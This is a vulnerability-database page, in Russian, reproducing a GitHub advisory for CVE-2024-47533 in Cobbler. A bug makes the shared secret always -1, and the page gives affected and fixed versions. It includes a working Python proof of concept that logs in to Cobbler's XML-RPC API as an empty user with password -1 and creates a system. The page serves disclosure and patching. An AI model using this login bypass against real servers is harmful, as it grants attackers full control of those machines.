Логотип exploitDog
Консоль
Логотип exploitDog

exploitDog

github логотип

GHSA-m26c-fcgh-cp6h

Опубликовано: 18 нояб. 2024
Источник: github
Github: Прошло ревью
CVSS3: 9.8

Описание

cobbler allows anyone to connect to cobbler XML-RPC server with known password and make changes

Summary

utils.get_shared_secret() always returns -1 - allows anyone to connect to cobbler XML-RPC as user '' password -1 and make any changes.

Details

utils.py get_shared_secret:

def get_shared_secret() -> Union[str, int]: """ The 'web.ss' file is regenerated each time cobblerd restarts and is used to agree on shared secret interchange between the web server and cobblerd, and also the CLI and cobblerd, when username/password access is not required. For the CLI, this enables root users to avoid entering username/pass if on the Cobbler server. :return: The Cobbler secret which enables full access to Cobbler. """ try: with open("/var/lib/cobbler/web.ss", 'rb', encoding='utf-8') as fd: data = fd.read() except: return -1 return str(data).strip()

Always returns -1 because of the following exception:

binary mode doesn't take an encoding argument

This appears to have been introduced by commit 32c5cada013dc8daa7320a8eda9932c2814742b0 and so affects versions 3.0.0+.

PoC

#!/usr/bin/python3 import ssl import xmlrpc.client params = { 'proto': 'https', 'host': 'COBBLER_SERVER', 'port': '443', 'username': '', 'password': -1 } ssl_context = ssl._create_unverified_context() url = '{proto}://{host}:{port}/cobbler_api'.format(**params) if ssl_context: conn = xmlrpc.client.ServerProxy(url, context=ssl_context) else: conn = xmlrpc.client.Server(url) try: token = conn.login(params['username'], params['password']) except xmlrpc.client.Fault as e: print("Failed to log in to Cobbler '{url}' as '{username}'. {error}".format(url=url, error=e, **params)) except Exception as e: print("Connection to '{url}' failed. {error}".format(url=url, error=e, **params)) print("Login success!") system_id = conn.new_system(token)

Impact

This gives anyone with network access to a cobbler server full control of the server.

Ссылки

Пакеты

Наименование

cobbler

pip
Затронутые версииВерсия исправления

>= 3.3.0, < 3.3.7

3.3.7

Наименование

cobbler

pip
Затронутые версииВерсия исправления

>= 3.0.0, < 3.2.3

3.2.3

EPSS

Процентиль: 99%
0.68594
Средний

9.8 Critical

CVSS3

CVE ID

CVE-2024-47533

Дефекты

CWE-287

Связанные уязвимости

ubuntu логотип

CVE-2024-47533

CVSS3: 9.8
ubuntu
около 1 года назад

Cobbler, a Linux installation server that allows for rapid setup of network installation environments, has an improper authentication vulnerability starting in version 3.0.0 and prior to versions 3.2.3 and 3.3.7. `utils.get_shared_secret()` always returns `-1`, which allows anyone to connect to cobbler XML-RPC as user `''` password `-1` and make any changes. This gives anyone with network access to a cobbler server full control of the server. Versions 3.2.3 and 3.3.7 fix the issue.

nvd логотип

CVE-2024-47533

CVSS3: 9.8
nvd
около 1 года назад

Cobbler, a Linux installation server that allows for rapid setup of network installation environments, has an improper authentication vulnerability starting in version 3.0.0 and prior to versions 3.2.3 and 3.3.7. `utils.get_shared_secret()` always returns `-1`, which allows anyone to connect to cobbler XML-RPC as user `''` password `-1` and make any changes. This gives anyone with network access to a cobbler server full control of the server. Versions 3.2.3 and 3.3.7 fix the issue.

debian логотип

CVE-2024-47533

CVSS3: 9.8
debian
около 1 года назад

Cobbler, a Linux installation server that allows for rapid setup of ne ...

suse-cvrf логотип

openSUSE-SU-2024:0382-1

suse-cvrf
около 1 года назад

Security update for cobbler

suse-cvrf логотип

openSUSE-SU-2024:0370-1

suse-cvrf
около 1 года назад

Security update for cobbler

EPSS

Процентиль: 99%
0.68594
Средний

9.8 Critical

CVSS3

CVE ID

CVE-2024-47533

Дефекты

CWE-287